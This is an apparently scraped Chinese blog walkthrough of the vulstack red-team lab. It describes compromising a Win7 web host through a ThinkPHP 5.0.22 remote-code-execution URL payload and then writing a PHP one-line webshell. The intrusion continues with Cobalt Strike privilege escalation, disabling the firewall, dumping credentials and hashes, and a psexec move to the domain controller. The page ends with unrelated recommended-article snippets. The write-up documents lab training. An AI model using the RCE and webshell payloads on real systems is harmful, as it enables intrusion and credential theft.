一、环境搭建:
①根据作者公开的靶机信息整理
虚拟机密码:
Win7:
heart 123.com    #本地管理员用户
sun\Administrator dc123.com    #域管用户,改为了panda123..
 
Win2008:
sun\admin 2020.com    #由于需要改密码,我更改为panda666...
 
②虚拟机网卡设置
Win7双网卡模拟内外网:
外网:桥接模式与物理机相通
内网:根据公开截图是:192.168.138.136,仅主机模式

利用管理员账号登进win7,并将其中一个网卡ip设置为桥接模式的通网段ip:192.168.1.136

 
Win2008只通内网不通外网:
内网:根据公开截图是:192.168.138.138,仅主机模式

③整体环境梳理
靶机:
Win7:192.168.1.136(外网),192.168.138.136(内网)
Win2008:192.168.138.138(内网)
 
攻击机:
kali:192.168.1.2
win10:192.168.1.7
 
利用本地管理员heart登陆win7,并开启phpstudy,启动web环境:

 
二、web层渗透:
0x01 前期信息收集与漏洞利用:
①端口、服务探测:
nmap 192.168.1.136 -T4 -A -sV
 
②初探web
发现开启了80和3306,访问80端口的http服务,发现是thinkphp

 
③thinkphp rce一把梭
随便输入路径,让其报错,发现是5.0.22版本
 
直接去搜索历史漏洞,看下有没有可以直接getshell的,不难找到exp,而且直接RCE了
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
④getshell
然后直接利用echo写入一句话方便后续操作,由于是靶机环境,不考虑免杀,实战中可能需要免杀一句话
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > shell.php
直接利用蚁剑连接webshell
 
0x02 目标本机信息收集
①发现目标有两个ip,并且存在域sun.com,DNS服务器为192.168.138.138,基本上DNS服务器就是域控
 
查看进程信息,并没有发现杀软
那么目标肯定是横向移动,最终拿下这台域控了,这里为了熟悉Cobaltstrike,所有的内网渗透操作将利用cs完成,并且不存在杀软,就不用考虑免杀了,毕竟是靶机嘛emmm...
 
 
三、内网横向渗透
0x01 让目标主机上线
①使用web_delivery的方式,生成powershell命令

虚拟终端执行payload

 
稍等一会就看见cs上线了

 
0x02 提权
①设置心跳时间为1s,查看当前权限为管理员权限,为了后续更好操作,提权至system

②查看补丁情况,并分析可利用漏洞提权exp
shell systeminfo

windows提权辅助脚本提示存在MS15-051

③利用CS一键提权

 
提权成功返回一个system权限的beacon

 
0x03 内网横向移动
①查看防火墙情况,发现是开启状态
shell netsh firewall show state

为了方便操作,将防火墙关闭
shell netsh advfirewall set allprofiles state off

②内网常规信息收集
当前域内计算机列表:
 
域控列表:

用户列表:

③抓取凭证hash

 
抓取到的全部明文密码、ntlm hash

④上线域用户leo
Spawn As派生会话

 
选择leo的凭证
 
成功拿到leo的beacon

 
⑤继续收集域内信息
net user \\192.168.138.138

又发现多了一个admin用户

 
⑥信息汇总整理:
域名:sun.com
域控:192.168.138.138,机器名:DC
域内机器:192.168.138.136(win7)、192.168.138.138(DC)
所有用户:
非域:heart:123.com;ntlm:afffeba176210fad4628f0524bfe1942
域内用户:sun\administrator(域管):panda123..;ntml:31d6cfe0d16ae931b73c59d7e0c089c0
sun\leo:123.com;ntml:afffeba176210fad4628f0524bfe1942
sun\admin(未知)
krbtgt(未知)
 
 
0x04 攻击域控
①网络环境分析
边界机win7可通外网、内网,域控只能与win7通信,不能出网,所以想要拿到DC权限,可以通过:
1.psexec配合SMB beacon上线DC机器
2.link Listener+IPC$连接上马
 
②横向psexec拿下DC beacon

 
选择域管凭证,并选择smb beacon的监听器,选择一个会话进行横向移动,点击choose

 
成功利用域管账号拿下DC的smb beacon

③导出域内所有hash

 
四、总结
0x01 总体内网拓扑

 
0x02 整体思路
1.端口探测发现80端口web服务,利用thinkphp 5.0.22 rce漏洞getshell
2.简单主机信息收集发现双网卡,判断存在内网环境,并且有域
3.配合windows检测脚本,判断出可利用exp,并利用cs进行提权
4.内网、域常规信息收集,并关闭了防火墙方便后续操作
5.通过凭证hash获取到域用户、域管、其他用户的密码、hash
6.利用抓取到的域管凭证+psexec进行横向到域控
7.经过分析当前网络情况发现域控并不能出网,所以通过SMB beacon+psexec进行横向,最终拿下域控

vulstack红队评估(五)的更多相关文章

  1. vulstack红队评估(四)

    一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu   win7: douser:Dotest123   Win2008 DC: administr ...

  2. vulstack红队评估(三)

    一.环境搭建: ①根据作者公开的靶机信息整理 没有虚拟机密码,纯黑盒测试...一共是5台机器,目标是拿下域控获取flag文件   ②虚拟机网卡设置 centos双网卡模拟内外网: 外网:192.168 ...

  3. vulstack红队评估(二)

    一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX     2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相 ...

  4. vulstack红队评估(一)

    一.环境搭建: 1.根据作者公开的靶机信息整理: 虚拟机初始所有统一密码:hongrisec@2019   因为登陆前要修改密码,改为了panda666...   2.虚拟网卡网络配置: ①Win7双 ...

  5. ATK&CK红队评估实战靶场 (一)的搭建和模拟攻击过程全过程

    介绍及环境搭建 靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练 ...

  6. ATT&CK红队评估实战靶场(一)

    靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻击拓扑如下 0x01环境搭建 配置两卡,仅主机模式192.168.52.0网段模拟内 ...

  7. Red Team 指南-第1章 红队和红队概述

    第1章 红队和红队概述 贡献者:Tony Kelly @infosectdk # 翻译者 BugMan 什么是红队?它来自哪里? 红队的起源是军事起源.人们意识到,为了更好地防御, 需要攻击自己的防御 ...

  8. 红队(red team)

    红队资源相关 https://threatexpress.com/redteaming/resources/ 红队相关技术 https://github.com/bluscreenofjeff/Red ...

  9. ATT&CK实战系列 红队实战(一)————环境搭建

    首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...

随机推荐

  1. JavaScript中foreach、map、filter、find、every、some的用法

    foreach:只是循环数组中的每一项,没有返回值 如:  var arr = [2,3,3,4,5,6]; arr.foreach(function(item,index,array){ dosom ...

  2. 【真相揭秘】requests获取网页编码乱码本质

    有没有被网页编码抓狂,怎么转都是乱码. 通过查看requests源代码,才发现是库本身历史原因造成的. 作者是严格http协议标准写这个库的,<HTTP权威指南>里第16章国际化里提到,如 ...

  3. HttpSession之表单的重复提交 & 验证码

    如果采用 HttpServletResponse.sendRedirct() 方法将客户端重定向到成功页面,将不会出现重复提交问题 1.表单的重复提交 1). 重复提交的情况: ①. 在表单提交到一个 ...

  4. 删除节点与插入节点 & innerHTML

    1.测试removeChild()方法: 删除节点dom9.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" &q ...

  5. String类练习

    1.模拟一个trim方法,去除字符串两端的空格 2.将一个字符串进行反转.将字符串中指定部分进行反转 3.获取一个字符串在另一个字符串中出现的次数 4.获取两个字符串中最大相同子串 5.对字符串中字符 ...

  6. 创建多线程的方式&Thread类的常用方法

    创建多线程的第一种方式:继承java.lang.Thread类 注意:1.一个线程只能执行一次start() 2.不能通过Thread实现类对象的 run()去启动一个线程 3.增加加一个线程,需要新 ...

  7. 五、Java - 集合

    一.集合 Java 中的集合类存放于 java.util 包中,是一个存放对象的容器. 集合存放的是对对象的引用,对象本身还是存在于 JVM 堆内存中. 存放的是对象,即引用数据类型,对于基本数据类型 ...

  8. 利用Python进行数据分析第六季第七集

    翩翩一叶扁舟载不动许多愁https://www.wenjuan.com/s/uMRVrmv/双肩扛起的是数不尽的忧https://www.wenjuan.com/s/uMRVrmv给我一杯酒喝尽人间仇 ...

  9. Rocket - tilelink - Parameters

    https://mp.weixin.qq.com/s/1I6DcONr0Mg7xiX8F1C7SQ   简单介绍TileLink相关的参数实现(具体问题暂时不展开,后续用到时再做分析).   ​​   ...

  10. 【Java Spring Cloud 实战之路】- 使用Nacos和网关中心的创建

    0. 前言 在上一节中,我们创建了一个项目架构,后续的项目都会在那个架构上做补充. 1. Nacos 1.1 简介 Nacos可以用来发现.配置和管理微服务.提供了一组简单易用的特性集,可以快速实现动 ...